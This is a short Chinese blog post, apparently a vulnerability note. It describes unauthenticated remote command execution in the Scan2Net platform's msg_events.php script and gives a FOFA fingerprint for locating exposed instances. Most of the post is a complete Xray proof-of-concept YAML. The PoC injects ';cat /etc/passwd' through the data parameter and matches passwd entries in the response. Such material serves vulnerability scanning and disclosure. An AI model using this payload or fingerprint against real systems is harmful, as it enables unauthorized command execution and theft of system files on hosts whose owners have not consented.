Scan2Net平台远程命令执行漏洞

  参考链接:

https://mp.weixin.qq.com/s/Cg5Mcr7pWEYKobAOYOcPbw

漏洞介绍:

 

Scan2Net的 Web 界面具有网络访问权限的未经身份验证的攻击者可以以 www-data 用户的身份通过"msg_events.php”脚本执行任何系统命令

 

资产指纹:

 body="Scan2Net"

 Xray-poc:

 

复制代码
name: poc-yaml-scan2net-msgevents-command-exec
transport: http
rules:
  r0:
    request:
      method: GET
      path: /class/msg_events.php?action=writemsgfifo&data=;cat%20/etc/passwd
    expression: >-
      response.status == 200 &&
      "root:.*?:[0-9]*:[0-9]*:".matches(response.body_string)
expression: r0()
detail:
  author: Cysec
  links:
    - https://mp.weixin.qq.com/s/Cg5Mcr7pWEYKobAOYOcPbw
  description: Scan2Net的 Web 界面具有网络访问权限的未经身份验证的攻击者可以以 www-data 用户的身份通过"msg_events.php”脚本执行任何系统命令
  fofakeywords: body="Scan2Net"
复制代码

 

posted @   Cysec  阅读(5)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
点击右上角即可分享
微信分享提示